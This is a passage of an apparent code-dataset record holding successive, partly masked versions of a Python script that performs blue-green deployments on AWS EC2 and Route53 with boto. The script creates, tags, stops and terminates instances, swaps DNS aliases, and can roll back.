url.\n :param\n aws_connection: Connections to AWS Route53 service and EC2\n domain: Your Domain\n current_live: blue.<domain> or green.<domain> depends which is live\n live_alias: Your external DNS record pointing to live web server.\n dry-run: True or False. If True, it will not make any changes.\n :return: Result of the change (AWS respond).\n \"\"\"\n route53_conn = aws_connection.get('route53')\n zone = route53_conn.get_zone(domain)\n records = route53.record.ResourceRecordSets(connection=route53_conn,\n hosted_zone_id=zone.id)\n if dry_run:\n LOGGER.warn('DNS record %s would be updated with %s' % (live_alias,\n green_alias if current_live == blue_alias else blue_alias))\n result = 'OK'\n elif current_live == blue_alias:\n result = swap_dns(live_alias, green_alias, green_alias, zone, records)\n else:\n result = swap_dns(live_alias, blue_alias, blue_alias, zone, records)\n return result\n\n\ndef assign_to_staging(route53_conn, domain, current_live,\n instance_public_ip, live_alias, blue_alias, green_alias, dry_run=False):\n \"\"\"\n :description: Assigns newly created instance to staging url\n :param\n route53_conn: Connection to AWS Route53 service\n domain: Your Domain\n current_live: blue.<domain> or green.<domain> depends which one was behind your live url.\n instance_public_ip: Public IP of newly created instance that would be assigned to staging url.\n dry-run: True or False. If True, it will not make any changes.\n :return: Result of the change (AWS respond).\n \"\"\"\n zone = route53_conn.get_zone(domain)\n records = route53.record.ResourceRecordSets(connection=route53_conn,\n hosted_zone_id=zone.id)\n if dry_run:\n LOGGER.warn('Public IP %s would be assigned to %s' % (\n instance_public_ip, live_alias))\n result = 'OK'\n else:\n result = swap_dns(blue_alias if current_live == green_alias else\n green_alias, instance_public_ip, None, zone, records)\n return result\n\n\n<mask token>\n\n\ndef wait_for_public_ip(ec2_conn, instance_id):\n \"\"\"\n :description: Gets instance's Public IP. Retries every 5 seconds for 30 seconds.\n :param\n ec2_conn: Connection to AWS EC2 service\n instance_id: ID of instance :)\n :return: Public IP or exits the script\n \"\"\"\n counter = 0\n while counter < 24:\n stg_instance = ec2_conn.get_only_instances(instance_ids=[instance_id])\n if stg_instance[0].ip_address is None:\n time.sleep(10)\n else:\n public_ip = stg_instance[0].ip_address\n return str(public_ip)\n counter += 1\n stg_instance = ec2_conn.get_only_instances(instance_ids=[instance_id])\n LOGGER.error('Cannot get Public IP from instance %s' % stg_instance[0].id)\n sys.exit(1)\n\n\ndef simple_check(url):\n \"\"\"\n :description: Checks if given url is returning 200 respond code for 10 minutes in 60 seconds intervals.\n :param\n url: link which should be checked\n :return: Boolean\n \"\"\"\n counter = 0\n while counter < 10:\n try:\n r = requests.head('http://' + url)\n LOGGER.debug(r.status_code)\n if r.status_code == 200:\n return True\n else:\n time.sleep(60)\n except requests.ConnectionError:\n LOGGER.error('Failed to get respond code from %s - attempt #%s' %\n (url, counter + 1))\n return False\n\n\n<mask token>\n\n\ndef switch(region, access_key, secret_key, tag, domain, live_url,\n blue_alias, green_alias, dry_run=False):\n \"\"\"\n :description: Rolls back deployment by starting instance with old-app tag and swapping dns entry.\n :param\n ec2_conn: Connection to AWS EC2 service\n old_tag: Dictionary with <tag_name> <tag_value> pair\n dry-run: True or False. If True, it will not make any changes.\n :return: boolean status\n \"\"\"\n result = True\n aws_conn = connect_to_aws(region, access_key, secret_key)\n live = check_which_is_live(aws_conn.get('route53'), domain, live_url)\n result = swap_live_with_staging(aws_conn, domain, live, live_url,\n blue_alias, green_alias, dry_run)\n time.sleep(300)\n stop_instance(aws_conn, get_env(live, domain), domain, live_url, tag,\n dry_run)\n return result\n\n\ndef roll_back(region, access_key, secret_key, tag, domain, live_alias,\n blue_alias, green_alias, dry_run=False):\n \"\"\"\n :description: Rolls back deployment by starting instance with old-app tag and swapping dns entry.\n :param\n ec2_conn: Connection to AWS EC2 service\n old_tag: Dictionary with <tag_name> <tag_value> pair\n dry-run: True or False. If True, it will not make any changes.\n :return: boolean status\n \"\"\"\n result = True\n aws_conn = connect_to_aws(region, access_key, secret_key)\n old_instance = get_specific_instances(aws_conn.get('ec2'), ''.join(tag.\n keys()), ''.join(tag.values()), ['stopped', 'running'])\n current_live = check_which_is_live(aws_conn.get('route53'), domain,\n live_alias)\n env = get_env(current_live, domain)\n if not old_instance:\n LOGGER.error(\n 'No instance with tag %s was found. No chance to roll back Sir!' %\n ''.join(tag.values()))\n else:\n try:\n if dry_run:\n LOGGER.warning(\n 'Instance %s would be started and tagged with %s' % (\n old_instance, env))\n else:\n old_instance[0].start()\n tag_instance(old_instance[0], 'Environment', 'blue' if env ==\n 'green' else 'green')\n instance_public_ip = wait_for_public_ip(aws_conn.get('ec2'),\n old_instance[0].id)\n assign_to_staging(aws_conn.get('route53'), domain, current_live,\n instance_public_ip, live_alias, blue_alias, green_alias,\n dry_run=False)\n swap_live_with_staging(aws_conn, domain, current_live,\n live_alias, blue_alias, green_alias, dry_run)\n stop_instance(aws_conn, env, domain, live_alias, tag, dry_run)\n except exception.EC2ResponseError:\n LOGGER.error('Could not start %s instance.' % old_instance)\n result = False\n return result\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef read_config_file(logger):\n import aws_config\n try:\n domain = getattr(aws_config, 'domain')\n config = {'reg': getattr(aws_config, 'region'), 'access': getattr(\n aws_config, 'access_key'), 'secret': getattr(aws_config,\n 'secret_key'), 'srv': getattr(aws_config, 'instance_name'),\n 'domain': domain, 'alias': getattr(aws_config,\n 'live_record_name') + '.' + domain, 'image': getattr(aws_config,\n 'ami_id'), 'key': getattr(aws_config, 'key_pair'), 'sec': [\n getattr(aws_config, 'security_group')], 'subnet': getattr(\n aws_config, 'subnet_id'), 'type': getattr(aws_config,\n 'instance_size'), 'shutdown': getattr(aws_config,\n 'shutdown_behavior'), 'dry-run': getattr(aws_config, 'dry_run')}\n except AttributeError as at_err:\n logger.error('Could not read parameters from aws_config.py file. [%s]',\n at_err)\n region = os.environ['AWS_DEFAULT_REGION']\n aws_access_key = os.environ['AWS_ACCESS_KEY_ID']\n aws_secret_key = os.environ['AWS_SECRET_ACCESS_KEY']\n if region is None or aws_access_key is None or aws_secret_key is None:\n logger.error('Could not find AWS credentials in local variables')\n sys.exit(1)\n else:\n logger.info('Got AWS credentials from local variables')\n return config\n\n\n<mask token>\n\n\ndef connect_to_aws(region, aws_access_key, aws_secret_key):\n \"\"\"\n :param:\n region: AWS region\n aws_access_key: AWS Access Key\n aws_secret_key: AWS Secret Key\n :return: map of aws services and connection handles for them.\n \"\"\"\n ec2_conn = ec2.connect_to_region(region_name=region, aws_access_key_id=\n aws_access_key, aws_secret_access_key=aws_secret_key)\n route53_conn = route53.Route53Connection(aws_access_key_id=\n aws_access_key, aws_secret_access_key=aws_secret_key)\n if ec2_conn is None:\n logging.error(\n 'Could not connect to Ec2 with this parameters: %s, %s, <secret key>'\n , region, aws_access_key)\n sys.exit(1)\n else:\n logging.info('Connected to AWS EC2 [%s]', region)\n if route53_conn is None:\n logging.error(\n 'Could not connect to Route53 with this parameters: %s, <secret key>'\n , aws_access_key)\n sys.exit(1)\n else:\n logging.info('Connected to AWS Route53')\n return {'ec2': ec2_conn, 'route53': route53_conn}\n\n\ndef get_specific_instances(ec2_conn, tag_key, tag_value, instance_state):\n \"\"\"\n :description: Returns requested instance - uses filters to get it.\n :param\n ec2_conn: Connections to AWS EC2.\n tag_key: Name of the tag.\n tag_value: Value of the tag.\n instance_state: One of three states - \"running\" / \"pending\" / \"stopped\".\n :return: boolean result.\n \"\"\"\n instances = ec2_conn.get_only_instances(filters={'tag:{0}'.format(\n tag_key): tag_value, 'instance-state-name': instance_state})\n return instances\n\n\ndef create_new_instance(ec2_conn, image_id, ssh_key, sec_group, subnet_id,\n env, instance_name, user_data=None, instance_size='t2.micro', shutdown=\n 'stop', dry_run=False):\n \"\"\"\n :param\n ec2_conn: connection to AWS EC2 service\n image_id: Amazon Machine Image ID with all your software\n ssh_key: AWS key pair name\n sec_group: Security group ID that should be allocated\n subnet_id: Subnet ID in which your instance should be created\n env: Environment (blue / green / old_app)\n instance_name: Name tag value\n user_data: Cloud-Init script that will run once\n instance_size: String with instance size\n shutdown_behaviour: stop or termination\n dry-run: True or False. If True, it will not make any changes.\n :return: instance ID if created or None\n \"\"\"\n instances = get_specific_instances(ec2_conn, 'Environment', env, [\n 'running', 'pending'])\n if not instances:\n try:\n reservations = ec2_conn.run_instances(image_id, key_name=\n ssh_key, user_data=user_data, instance_type=instance_size,\n subnet_id=subnet_id, security_group_ids=sec_group,\n instance_initiated_shutdown_behavior=shutdown, dry_run=dry_run)\n if reservations is not None and not dry_run:\n tag_new_instance(reservations.instances[0], instance_name, env)\n else:\n LOGGER.error('Something went wrong when creating new instance.'\n )\n sys.exit(1)\n except exception.EC2ResponseError:\n if dry_run:\n LOGGER.warn(\n 'New instance would be created and this tags should be assigned'\n )\n LOGGER.warn('Name: %s' % instance_name)\n LOGGER.warn('Environment: %s' % env)\n LOGGER.warn('Deployment Date: %s' % time.strftime('%d-%m-%Y'))\n return 'OK'\n else:\n LOGGER.error('Something went wrong when creating new instance.'\n )\n try:\n time.sleep(60)\n tag_new_instance(reservations.instances[0],\n instance_name, env)\n except exception.EC2ResponseError:\n sys.exit(1)\n else:\n LOGGER.warn(\n 'There is another instance running with %s environment tag (id: %s).'\n % (env, instances[0]))\n return None\n return reservations.instances\n\n\ndef tag_instance(instance, tag_name, tag_key):\n \"\"\"\n :description: Removes old tag and creates new one with updated value.\n :param\n instance: Instance that should be tagged.\n tag_name: Name of the tag.\n tag_key: Value of the tag.\n :return: None\n \"\"\"\n instance.remove_tag('{0}'.format(tag_name))\n instance.add_tag('{0}'.format(tag_name), '{0}'.format(tag_key))\n\n\ndef tag_new_instance(instance, instance_name, environment):\n \"\"\"\n :description: Tags new instance.\n :param\n instance: Instance that should be tagged.\n instance_name: Name of the instance.\n environment: blue org green.\n :return: None\n \"\"\"\n instance.add_tag('Name', instance_name)\n instance.add_tag('Environment', environment)\n instance.add_tag('Deployment Date', time.strftime('%d-%m-%Y'))\n\n\ndef stop_instance(aws_connection, env, domain, live_alias, tag, dry_run=False):\n \"\"\"\n :description: Stops past live instance.\n :param\n aws_connection: Connections to AWS Route53 service and EC2.\n env: Blue or green depends which instance you want to stop (cross check).\n domain: Your Domain.\n live_alias: Your external DNS record pointing to live web server.\n dry-run: True or False. If True, it will not make any changes.\n :return: boolean result.\n \"\"\"\n result = False\n tag = ''.join(tag.values())\n instances = get_specific_instances(aws_connection.get('ec2'),\n 'Environment', env, 'running')\n if check_which_is_live(aws_connection.get('route53'), domain, live_alias\n ) != env + '.' + domain and instances:\n try:\n aws_connection.get('ec2').stop_instances(instance_ids=[\n instances[0].id], dry_run=dry_run)\n tag_instance(instances[0], 'Environment', tag)\n except exception.EC2ResponseError:\n LOGGER.warn(\n 'Instance %s would be stopped and tagged with Environment:%s' %\n (instances[0].id, tag))\n result = True\n elif dry_run:\n LOGGER.warning('Old instance with tag %s would be stopped.' % env)\n else:\n LOGGER.error(\n 'Could not stop the old instance. It looks like it is live or doesnt exist. I tried to stop %s instance.'\n % env)\n return result\n\n\n<mask token>\n\n\ndef get_env(fqdn, domain):\n \"\"\"\n :description: Give you environment from given fqdn by removing domain from fqdn.\n :param\n fqdn: Fully Qualified Domain Name.\n domain: Your domain name.\n :return: environment (blue or green).\n \"\"\"\n env = fqdn.replace('.' + domain, '')\n return env\n\n\ndef swap_dns(live_alias, future_value, alias_dns_name, zone, records):\n \"\"\"\n :description: Changes alias (blue.<domain> or green.<domain>) that is behind live url.\n :param\n live_alias: Your external DNS record pointing to live web server.\n future_alias: blue.<domain> or green.<domain> depends which is going to be live.\n zone: handle to zone that hosts dns records.\n records: sets of dns records from the zone..\n :return: Result of the change (AWS respond).\n \"\"\"\n try:\n change = records.add_change(action='UPSERT', name=live_alias, ttl=\n 300, type='A', alias_dns_name=alias_dns_name,\n alias_hosted_zone_id=zone.id, alias_evaluate_target_health=False)\n change.add_value(future_value)\n result = records.commit()\n except Exception as ex:\n LOGGER.error('Could not swap dns entry for %s. Exception: %s' % (\n live_alias, ex))\n sys.exit(1)\n return result\n\n\ndef swap_live_with_staging(aws_connection, domain, current_live, live_alias,\n blue_alias, green_alias, dry_run=False):\n \"\"\"\n :description: Changes alias (blue.<domain> or green.<domain>) that is behind live url.\n :param\n aws_connection: Connections to AWS Route53 service and EC2\n domain: Your Domain\n current_live: blue.<domain> or green.<domain> depends which is live\n live_alias: Your external DNS record pointing to live web server.\n dry-run: True or False. If True, it will not make any changes.\n :return: Result of the change (AWS respond).\n \"\"\"\n route53_conn = aws_connection.get('route53')\n zone = route53_conn.get_zone(domain)\n records = route53.record.ResourceRecordSets(connection=route53_conn,\n hosted_zone_id=zone.id)\n if dry_run:\n LOGGER.warn('DNS record %s would be updated with %s' % (live_alias,\n green_alias if current_live == blue_alias else blue_alias))\n result = 'OK'\n elif current_live == blue_alias:\n result = swap_dns(live_alias, green_alias, green_alias, zone, records)\n else:\n result = swap_dns(live_alias, blue_alias, blue_alias, zone, records)\n return result\n\n\ndef assign_to_staging(route53_conn, domain, current_live,\n instance_public_ip, live_alias, blue_alias, green_alias, dry_run=False):\n \"\"\"\n :description: Assigns newly created instance to staging url\n :param\n route53_conn: Connection to AWS Route53 service\n domain: Your Domain\n current_live: blue.<domain> or green.<domain> depends which one was behind your live url.\n instance_public_ip: Public IP of newly created instance that would be assigned to staging url.\n dry-run: True or False. If True, it will not make any changes.\n :return: Result of the change (AWS respond).\n \"\"\"\n zone = route53_conn.get_zone(domain)\n records = route53.record.ResourceRecordSets(connection=route53_conn,\n hosted_zone_id=zone.id)\n if dry_run:\n LOGGER.warn('Public IP %s would be assigned to %s' % (\n instance_public_ip, live_alias))\n result = 'OK'\n else:\n result = swap_dns(blue_alias if current_live == green_alias else\n green_alias, instance_public_ip, None, zone, records)\n return result\n\n\n<mask token>\n\n\ndef wait_for_public_ip(ec2_conn, instance_id):\n \"\"\"\n :description: Gets instance's Public IP. Retries every 5 seconds for 30 seconds.\n :param\n ec2_conn: Connection to AWS EC2 service\n instance_id: ID of instance :)\n :return: Public IP or exits the script\n \"\"\"\n counter = 0\n while counter < 24:\n stg_instance = ec2_conn.get_only_instances(instance_ids=[instance_id])\n if stg_instance[0].ip_address is None:\n time.sleep(10)\n else:\n public_ip = stg_instance[0].ip_address\n return str(public_ip)\n counter += 1\n stg_instance = ec2_conn.get_only_instances(instance_ids=[instance_id])\n LOGGER.error('Cannot get Public IP from instance %s' % stg_instance[0].id)\n sys.exit(1)\n\n\ndef simple_check(url):\n \"\"\"\n :description: Checks if given url is returning 200 respond code for 10 minutes in 60 seconds intervals.\n :param\n url: link which should be checked\n :return: Boolean\n \"\"\"\n counter = 0\n while counter < 10:\n try:\n r = requests.head('http://' + url)\n LOGGER.debug(r.status_code)\n if r.status_code == 200:\n return True\n else:\n time.sleep(60)\n except requests.ConnectionError:\n LOGGER.error('Failed to get respond code from %s - attempt #%s' %\n (url, counter + 1))\n return False\n\n\n<mask token>\n\n\ndef switch(region, access_key, secret_key, tag, domain, live_url,\n blue_alias, green_alias, dry_run=False):\n \"\"\"\n :description: Rolls back deployment by starting instance with old-app tag and swapping dns entry.\n :param\n ec2_conn: Connection to AWS EC2 service\n old_tag: Dictionary with <tag_name> <tag_value> pair\n dry-run: True or False. If True, it will not make any changes.\n :return: boolean status\n \"\"\"\n result = True\n aws_conn = connect_to_aws(region, access_key, secret_key)\n live = check_which_is_live(aws_conn.get('route53'), domain, live_url)\n result = swap_live_with_staging(aws_conn, domain, live, live_url,\n blue_alias, green_alias, dry_run)\n time.sleep(300)\n stop_instance(aws_conn, get_env(live, domain), domain, live_url, tag,\n dry_run)\n return result\n\n\ndef roll_back(region, access_key, secret_key, tag, domain, live_alias,\n blue_alias, green_alias, dry_run=False):\n \"\"\"\n :description: Rolls back deployment by starting instance with old-app tag and swapping dns entry.\n :param\n ec2_conn: Connection to AWS EC2 service\n old_tag: Dictionary with <tag_name> <tag_value> pair\n dry-run: True or False. If True, it will not make any changes.\n :return: boolean status\n \"\"\"\n result = True\n aws_conn = connect_to_aws(region, access_key, secret_key)\n old_instance = get_specific_instances(aws_conn.get('ec2'), ''.join(tag.\n keys()), ''.join(tag.values()), ['stopped', 'running'])\n current_live = check_which_is_live(aws_conn.get('route53'), domain,\n live_alias)\n env = get_env(current_live, domain)\n if not old_instance:\n LOGGER.error(\n 'No instance with tag %s was found. No chance to roll back Sir!' %\n ''.join(tag.values()))\n else:\n try:\n if dry_run:\n LOGGER.warning(\n 'Instance %s would be started and tagged with %s' % (\n old_instance, env))\n else:\n old_instance[0].start()\n tag_instance(old_instance[0], 'Environment', 'blue' if env ==\n 'green' else 'green')\n instance_public_ip = wait_for_public_ip(aws_conn.get('ec2'),\n old_instance[0].id)\n assign_to_staging(aws_conn.get('route53'), domain, current_live,\n instance_public_ip, live_alias, blue_alias, green_alias,\n dry_run=False)\n swap_live_with_staging(aws_conn, domain, current_live,\n live_alias, blue_alias, green_alias, dry_run)\n stop_instance(aws_conn, env, domain, live_alias, tag, dry_run)\n except exception.EC2ResponseError:\n LOGGER.error('Could not start %s instance.' % old_instance)\n result = False\n return result\n\n\n<mask token>\n",
"step-5": "__author__ = 'jacek gruzewski'\n\n#!/user/bin/python3.4\n\n\"\"\"\nTo do: throw exceptions rather than calling sys.exit(1)\n\"\"\"\n\n############################################################\n# IMPORTS\n############################################################\n\n# Python's libraries\nimport time\nimport sys\nimport logging\nimport os\nimport requests\n\n# AWS Boto library\nfrom boto import ec2, route53, exception\n\n#####################################################################\n# Static data and configuration\n#####################################################################\n\n# Static AWS Rest service for getting instance details\nAWS_METADATA = 'http://169.254.169.254/latest/meta-data/instance-id'\n\nlog_path = '/var/log/'\nfile_name = 'blue-green-deploy'\n\n#####################################################################\n# Functions\n#####################################################################\n\n\ndef read_config_file(logger):\n # Config file imports\n import aws_config\n\n try:\n # Checking if all attributes were set.\n\n domain = getattr(aws_config, \"domain\")\n\n config = {\n 'reg': getattr(aws_config, \"region\"),\n 'access': getattr(aws_config, \"access_key\"),\n 'secret': getattr(aws_config, \"secret_key\"),\n 'srv': getattr(aws_config, \"instance_name\"),\n 'domain': domain,\n 'alias': getattr(aws_config, \"live_record_name\") + \".\" + domain,\n 'image': getattr(aws_config, \"ami_id\"),\n 'key': getattr(aws_config, \"key_pair\"),\n 'sec': [getattr(aws_config, \"security_group\")],\n 'subnet': getattr(aws_config, \"subnet_id\"),\n 'type': getattr(aws_config, \"instance_size\"),\n 'shutdown': getattr(aws_config, \"shutdown_behavior\"),\n 'dry-run': getattr(aws_config, \"dry_run\")\n }\n except AttributeError as at_err:\n # Falling back to local variables. Worth to try!\n logger.error('Could not read parameters from aws_config.py file. [%s]', at_err)\n region = os.environ['AWS_DEFAULT_REGION']\n aws_access_key = os.environ['AWS_ACCESS_KEY_ID']\n aws_secret_key = os.environ['AWS_SECRET_ACCESS_KEY']\n\n if region is None or aws_access_key is None or aws_secret_key is None:\n # At least we tried.\n logger.error('Could not find AWS credentials in local variables')\n sys.exit(1)\n else:\n logger.info('Got AWS credentials from local variables')\n\n return config\n\n\ndef set_up_logging(path, file):\n # Log file. Always in /var/log!! It will log into the file and console\n logging.basicConfig(level=logging.WARN)\n log_formatter = logging.Formatter(\"%(asctime)s [%(levelname)-5.5s] %(message)s\")\n root_logger = logging.getLogger()\n\n file_handler = logging.FileHandler(\"{0}/{1}.log\".format(path, file))\n file_handler.setFormatter(log_formatter)\n root_logger.addHandler(file_handler)\n\n return root_logger\n\n\ndef connect_to_aws(region, aws_access_key, aws_secret_key):\n \"\"\"\n :param:\n region: AWS region\n aws_access_key: AWS Access Key\n aws_secret_key: AWS Secret Key\n :return: map of aws services and connection handles for them.\n \"\"\"\n ec2_conn = ec2.connect_to_region(region_name=region,\n aws_access_key_id=aws_access_key,\n aws_secret_access_key=aws_secret_key)\n\n route53_conn = route53.Route53Connection(aws_access_key_id=aws_access_key,\n aws_secret_access_key=aws_secret_key)\n\n if ec2_conn is None:\n logging.error('Could not connect to Ec2 with this parameters: %s, %s, <secret key>', region, aws_access_key)\n sys.exit(1)\n else:\n logging.info('Connected to AWS EC2 [%s]', region)\n\n if route53_conn is None:\n logging.error('Could not connect to Route53 with this parameters: %s, <secret key>', aws_access_key)\n sys.exit(1)\n else:\n logging.info('Connected to AWS Route53')\n\n return {'ec2': ec2_conn, 'route53': route53_conn}\n\n\ndef get_specific_instances(ec2_conn, tag_key, tag_value, instance_state):\n \"\"\"\n :description: Returns requested instance - uses filters to get it.\n :param\n ec2_conn: Connections to AWS EC2.\n tag_key: Name of the tag.\n tag_value: Value of the tag.\n instance_state: One of three states - \"running\" / \"pending\" / \"stopped\".\n :return: boolean result.\n \"\"\"\n # Filters instances with specific tag and in specific state.\n instances = ec2_conn.get_only_instances(filters={\"tag:{0}\".format(tag_key): tag_value,\n \"instance-state-name\": instance_state})\n\n return instances\n\n\ndef create_new_instance(ec2_conn, image_id, ssh_key, sec_group, subnet_id, env, instance_name, user_data=None,\n instance_size='t2.micro', shutdown='stop', dry_run=False):\n \"\"\"\n :param\n ec2_conn: connection to AWS EC2 service\n image_id: Amazon Machine Image ID with all your software\n ssh_key: AWS key pair name\n sec_group: Security group ID that should be allocated\n subnet_id: Subnet ID in which your instance should be created\n env: Environment (blue / green / old_app)\n instance_name: Name tag value\n user_data: Cloud-Init script that will run once\n instance_size: String with instance size\n shutdown_behaviour: stop or termination\n dry-run: True or False. If True, it will not make any changes.\n :return: instance ID if created or None\n \"\"\"\n # Checks (by filtering instances currently running) if there is no other instance running with the same tags.\n instances = get_specific_instances(ec2_conn, \"Environment\", env, [\"running\", \"pending\"])\n\n if not instances:\n # If list is not empty. Creates new instance.\n try:\n reservations = ec2_conn.run_instances(image_id,\n key_name=ssh_key,\n user_data=user_data,\n instance_type=instance_size,\n subnet_id=subnet_id,\n security_group_ids=sec_group,\n instance_initiated_shutdown_behavior=shutdown,\n dry_run=dry_run)\n\n if reservations is not None and not dry_run:\n # When instance was created, we have to assign tags.\n tag_new_instance(reservations.instances[0], instance_name, env)\n else:\n LOGGER.error('Something went wrong when creating new instance.')\n sys.exit(1)\n except exception.EC2ResponseError:\n if dry_run:\n LOGGER.warn('New instance would be created and this tags should be assigned')\n LOGGER.warn('Name: %s' % instance_name)\n LOGGER.warn('Environment: %s' % env)\n LOGGER.warn('Deployment Date: %s' % time.strftime(\"%d-%m-%Y\"))\n return 'OK'\n else:\n LOGGER.error('Something went wrong when creating new instance.')\n\n try:\n # Last chance - waiting 1 minute to tag instance.\n time.sleep(60)\n tag_new_instance(reservations.instances[0], instance_name, env)\n except exception.EC2ResponseError:\n sys.exit(1)\n else:\n # Looks like there was another instance running with the same tags.\n LOGGER.warn('There is another instance running with %s environment tag (id: %s).' % (env, instances[0]))\n return None\n\n return reservations.instances\n\n\ndef tag_instance(instance, tag_name, tag_key):\n \"\"\"\n :description: Removes old tag and creates new one with updated value.\n :param\n instance: Instance that should be tagged.\n tag_name: Name of the tag.\n tag_key: Value of the tag.\n :return: None\n \"\"\"\n instance.remove_tag('{0}'.format(tag_name))\n instance.add_tag('{0}'.format(tag_name), '{0}'.format(tag_key))\n\n\ndef tag_new_instance(instance, instance_name, environment):\n \"\"\"\n :description: Tags new instance.\n :param\n instance: Instance that should be tagged.\n instance_name: Name of the instance.\n environment: blue org green.\n :return: None\n \"\"\"\n instance.add_tag('Name', instance_name)\n instance.add_tag('Environment', environment)\n instance.add_tag('Deployment Date', time.strftime(\"%d-%m-%Y\"))\n\n\ndef stop_instance(aws_connection, env, domain, live_alias, tag, dry_run=False):\n \"\"\"\n :description: Stops past live instance.\n :param\n aws_connection: Connections to AWS Route53 service and EC2.\n env: Blue or green depends which instance you want to stop (cross check).\n domain: Your Domain.\n live_alias: Your external DNS record pointing to live web server.\n dry-run: True or False. If True, it will not make any changes.\n :return: boolean result.\n \"\"\"\n result = False\n\n tag = ''.join(tag.values())\n\n # Gets past live instance.\n instances = get_specific_instances(aws_connection.get('ec2'), \"Environment\", env, \"running\")\n\n if check_which_is_live(aws_connection.get('route53'), domain, live_alias) != (env + \".\" + domain) and instances:\n # Instance is not live\n try:\n aws_connection.get('ec2').stop_instances(instance_ids=[instances[0].id], dry_run=dry_run)\n tag_instance(instances[0], 'Environment', tag)\n except exception.EC2ResponseError:\n LOGGER.warn('Instance %s would be stopped and tagged with Environment:%s' % (instances[0].id, tag))\n\n result = True\n else:\n if dry_run:\n LOGGER.warning('Old instance with tag %s would be stopped.' % env)\n else:\n LOGGER.error('Could not stop the old instance. It looks like it is live or doesnt exist. '\n 'I tried to stop %s instance.' % env)\n\n return result\n\n\ndef check_which_is_live(route53_conn, domain, live_alias):\n \"\"\"\n :description: Checks which alias (blue.<domain> or green.<domain>) is live.\n :param\n route53_conn: Connection to AWS Route53 service\n domain: Your Domain\n live_alias: Your external DNS record pointing to live web server.\n :return: fqdn of live sub alias (blue or green)\n \"\"\"\n live_fqdn = route53_conn.get_zone(domain).get_a(live_alias).alias_dns_name\n\n return live_fqdn\n\n\ndef get_env(fqdn, domain):\n \"\"\"\n :description: Give you environment from given fqdn by removing domain from fqdn.\n :param\n fqdn: Fully Qualified Domain Name.\n domain: Your domain name.\n :return: environment (blue or green).\n \"\"\"\n env = fqdn.replace(\".\" + domain, \"\")\n\n return env\n\n\ndef swap_dns(live_alias, future_value, alias_dns_name, zone, records):\n \"\"\"\n :description: Changes alias (blue.<domain> or green.<domain>) that is behind live url.\n :param\n live_alias: Your external DNS record pointing to live web server.\n future_alias: blue.<domain> or green.<domain> depends which is going to be live.\n zone: handle to zone that hosts dns records.\n records: sets of dns records from the zone..\n :return: Result of the change (AWS respond).\n \"\"\"\n try:\n change = records.add_change(action='UPSERT',\n name=live_alias,\n ttl=300,\n type='A',\n alias_dns_name=alias_dns_name,\n alias_hosted_zone_id=zone.id,\n alias_evaluate_target_health=False)\n change.add_value(future_value)\n result = records.commit()\n except Exception as ex:\n LOGGER.error('Could not swap dns entry for %s. Exception: %s' % (live_alias, ex))\n sys.exit(1)\n\n return result\n\n\ndef swap_live_with_staging(aws_connection, domain, current_live, live_alias, blue_alias, green_alias, dry_run=False):\n \"\"\"\n :description: Changes alias (blue.<domain> or green.<domain>) that is behind live url.\n :param\n aws_connection: Connections to AWS Route53 service and EC2\n domain: Your Domain\n current_live: blue.<domain> or green.<domain> depends which is live\n live_alias: Your external DNS record pointing to live web server.\n dry-run: True or False. If True, it will not make any changes.\n :return: Result of the change (AWS respond).\n \"\"\"\n route53_conn = aws_connection.get('route53')\n\n zone = route53_conn.get_zone(domain)\n\n records = route53.record.ResourceRecordSets(connection=route53_conn, hosted_zone_id=zone.id)\n\n if dry_run:\n # Dry run\n LOGGER.warn('DNS record %s would be updated with %s' %\n (live_alias, green_alias if current_live == blue_alias else blue_alias))\n\n result = 'OK'\n else:\n if current_live == blue_alias:\n # Blue was live so now time for Green.\n #if simple_check(green_alias):\n result = swap_dns(live_alias, green_alias, green_alias, zone, records)\n #else:\n # LOGGER.error('Staging is not running.')\n # sys.exit(1)\n\n else:\n # This time Green was live. Blue, are you ready?\n #if simple_check(blue_alias):\n result = swap_dns(live_alias, blue_alias, blue_alias, zone, records)\n #else:\n # LOGGER.error('Staging is not running.')\n # sys.exit(1)\n\n return result\n\n\ndef assign_to_staging(route53_conn, domain, current_live, instance_public_ip, live_alias, blue_alias, green_alias,\n dry_run=False):\n \"\"\"\n :description: Assigns newly created instance to staging url\n :param\n route53_conn: Connection to AWS Route53 service\n domain: Your Domain\n current_live: blue.<domain> or green.<domain> depends which one was behind your live url.\n instance_public_ip: Public IP of newly created instance that would be assigned to staging url.\n dry-run: True or False. If True, it will not make any changes.\n :return: Result of the change (AWS respond).\n \"\"\"\n zone = route53_conn.get_zone(domain)\n\n records = route53.record.ResourceRecordSets(connection=route53_conn, hosted_zone_id=zone.id)\n\n if dry_run:\n LOGGER.warn('Public IP %s would be assigned to %s' % (instance_public_ip, live_alias))\n\n result = 'OK'\n else:\n result = swap_dns(blue_alias if current_live == green_alias else green_alias, instance_public_ip, None, zone,\n records)\n\n return result\n\n\ndef delete_old_instance(ec2_conn, tag, dry_run=False):\n \"\"\"\n :description: Deletes instance for given tag only if it is stopped\n :param\n ec2_conn: Connection to AWS EC2 service\n old_tag: Dictionary with <tag_name> <tag_value> pair\n dry-run: True or False. If True, it will not make any changes.\n :return: boolean status\n \"\"\"\n result = False\n\n # Filters instances with tag Environment = old-app and only in stopped state.\n instances = get_specific_instances(ec2_conn, ''.join(tag.keys()), ''.join(tag.values()), \"stopped\")\n\n if len(instances) is 1:\n # If there is only 1 instance in that state.\n old = instances[0]\n\n LOGGER.debug(\"I am going to delete %s\" % old.id)\n try:\n deleted_old = ec2_conn.terminate_instances(instance_ids=[old.id], dry_run=dry_run)\n\n # Previous line should return instance that was deleted. Worth to check if it was the one we want to delete.\n if deleted_old[0].id == old.id:\n LOGGER.info('Deleted %s' % deleted_old[0].id)\n result = True\n except exception.EC2ResponseError as ex:\n if dry_run:\n LOGGER.error('Instance %s would be deleted.' % old.id)\n else:\n LOGGER.error('Something went wrong when deleting old instance.')\n\n LOGGER.error(ex)\n else:\n # It could be none or multiple instance in that state. Better notify before someone starts complaining.\n LOGGER.warn('No old instance or more than 1 instance was found. I hope you are aware of that. Continue.')\n result = True # I am returning true because it shouldn't be a big issue\n\n return result\n\n\ndef wait_for_public_ip(ec2_conn, instance_id):\n \"\"\"\n :description: Gets instance's Public IP. Retries every 5 seconds for 30 seconds.\n :param\n ec2_conn: Connection to AWS EC2 service\n instance_id: ID of instance :)\n :return: Public IP or exits the script\n \"\"\"\n counter = 0\n\n while counter < 24:\n # We are going to check every 10 seconds for 2 minutes.\n stg_instance = ec2_conn.get_only_instances(instance_ids=[instance_id])\n\n if stg_instance[0].ip_address is None:\n # Still not available so wait 5 seconds.\n 